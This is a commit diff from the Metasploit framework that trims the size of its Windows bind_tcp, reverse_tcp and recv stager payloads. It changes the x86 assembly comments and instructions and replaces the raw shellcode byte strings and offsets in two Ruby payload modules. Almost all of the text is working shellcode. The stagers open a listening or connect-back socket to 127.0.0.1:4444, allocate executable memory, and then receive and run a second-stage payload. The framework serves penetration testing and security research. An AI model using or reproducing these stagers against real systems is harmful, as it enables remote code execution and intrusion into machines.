shave a few bytes off of the windows stagers
git-svn-id: file:///home/svn/framework3/trunk@7035 4d416f70-5f16-0410-b530-b9f4589650daunstable
James Lee
parent
8b0a92ba1b
commit
e30e850ba7
|
|
@ -33,7 +33,7 @@ bind_tcp:
|
||||||
push eax ; push AF_INET
|
push eax ; push AF_INET
|
||||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||||
mov edi, eax ; save the socket for later
|
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
|
||||||
|
|
||||||
xor ebx, ebx ; Clear EBX
|
xor ebx, ebx ; Clear EBX
|
||||||
push ebx ; bind to 0.0.0.0
|
push ebx ; bind to 0.0.0.0
|
||||||
|
|
@ -57,7 +57,7 @@ bind_tcp:
|
||||||
call ebp ; accept( s, 0, 0 );
|
call ebp ; accept( s, 0, 0 );
|
||||||
|
|
||||||
push edi ; push the listening socket to close
|
push edi ; push the listening socket to close
|
||||||
mov edi, eax ; swap the new connected socket over the listening socket
|
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
|
||||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||||
call ebp ; closesocket( s );
|
call ebp ; closesocket( s );
|
||||||
|
|
||||||
|
|
@ -28,12 +28,12 @@ recv:
|
||||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||||
; Receive the second stage and execute it...
|
; Receive the second stage and execute it...
|
||||||
mov ebx, eax ; ebx = our new memory address for the new stage
|
xchg ebx, eax ; ebx = our new memory address for the new stage
|
||||||
push ebx ; push the address of the new stage so we can return into it
|
push ebx ; push the address of the new stage so we can return into it
|
||||||
read_more: ;
|
read_more: ;
|
||||||
push byte 0 ; flags
|
push byte 0 ; flags
|
||||||
push esi ; length
|
push esi ; length
|
||||||
push ebx ; the current address into our second stages RWX buffer
|
push ebx ; the current address into our second stage's RWX buffer
|
||||||
push edi ; the saved socket
|
push edi ; the saved socket
|
||||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||||
call ebp ; recv( s, buffer, length, 0 );
|
call ebp ; recv( s, buffer, length, 0 );
|
||||||
|
|
|
||||||
|
|
@ -33,7 +33,7 @@ reverse_tcp:
|
||||||
push eax ; push AF_INET
|
push eax ; push AF_INET
|
||||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||||
mov edi, eax ; save the socket for later
|
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
|
||||||
|
|
||||||
push 0x0100007F ; host 127.0.0.1
|
push 0x0100007F ; host 127.0.0.1
|
||||||
push 0x5C110002 ; family AF_INET and port 4444
|
push 0x5C110002 ; family AF_INET and port 4444
|
||||||
|
|
|
||||||
|
|
@ -32,9 +32,10 @@ module Metasploit3
|
||||||
'Convention' => 'sockedi',
|
'Convention' => 'sockedi',
|
||||||
'Stager' =>
|
'Stager' =>
|
||||||
{
|
{
|
||||||
'Offsets' => { 'LPORT' => [ 201, 'n' ] },
|
|
||||||
'RequiresMidstager' => false,
|
'RequiresMidstager' => false,
|
||||||
|
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
# Length: 298 bytes
|
||||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||||
|
|
@ -47,13 +48,13 @@ module Metasploit3
|
||||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
"\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57" +
|
||||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
"\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5" +
|
||||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
"\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D" +
|
||||||
"\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" +
|
"\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5" +
|
||||||
"\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" +
|
"\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53" +
|
||||||
"\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" +
|
"\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF" +
|
||||||
"\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
"\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
|
||||||
|
|
@ -32,9 +32,10 @@ module Metasploit3
|
||||||
'Convention' => 'sockedi',
|
'Convention' => 'sockedi',
|
||||||
'Stager' =>
|
'Stager' =>
|
||||||
{
|
{
|
||||||
'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },
|
|
||||||
'RequiresMidstager' => false,
|
'RequiresMidstager' => false,
|
||||||
|
'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], },
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
# Length: 272 bytes
|
||||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||||
|
|
@ -47,12 +48,13 @@ module Metasploit3
|
||||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
"\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10" +
|
||||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" +
|
"\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68" +
|
||||||
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" +
|
"\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56" +
|
||||||
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" +
|
"\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57" +
|
||||||
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
|
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
||||||
"\xEC\xC3"
|
|
||||||
|
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue